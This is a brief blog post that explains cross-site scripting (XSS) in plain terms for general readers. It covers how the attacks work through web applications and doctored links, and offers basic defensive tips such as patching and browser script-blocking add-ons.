Thursday

Cross-Site Scripting (XSS) - Huh?

You may have heard the term "Cross-Site Scripting", also shortened to "XSS", but it likely got caught by your "geeky stuff" filter. It's a very common method of screwing with your computer, often to get hold of your data and/or passwords. So, here is a brief and hopefully simple look at what it is.


XSS attacks occur via a web browser, and leverage web applications. A lot of web sites may take your information and apply it into a dynamic web page, such as a forum, comment section, or pretty much any other web site where you can enter data (Twitter, Facebook, et al).


The XSS exploit can "fool" your browser into also sending data to a location other than the intended webpage, and so can steal passwords, spread web viruses, gain control of your browser, and so on. The problems often start with a doctored link in an email, or in a message from a social media site.


A couple of things you do can include (of course) keeping your operating system and browser patched, and selectively allowing scripts to run from your browser. Most people will not do the latter, as it will "break" some sites. Both Mozilla Firefox and Google Chrome and other Chromium-based derivatives (such as Comodo Dragon) can use add-ons that can let you selectively block scripts.


Mostly though, the onus is on web developers to write their applications to avoid allowing XSS exploits in the first place; and as with most complex software, it's a bit of a cat-and-mouse game.

No comments :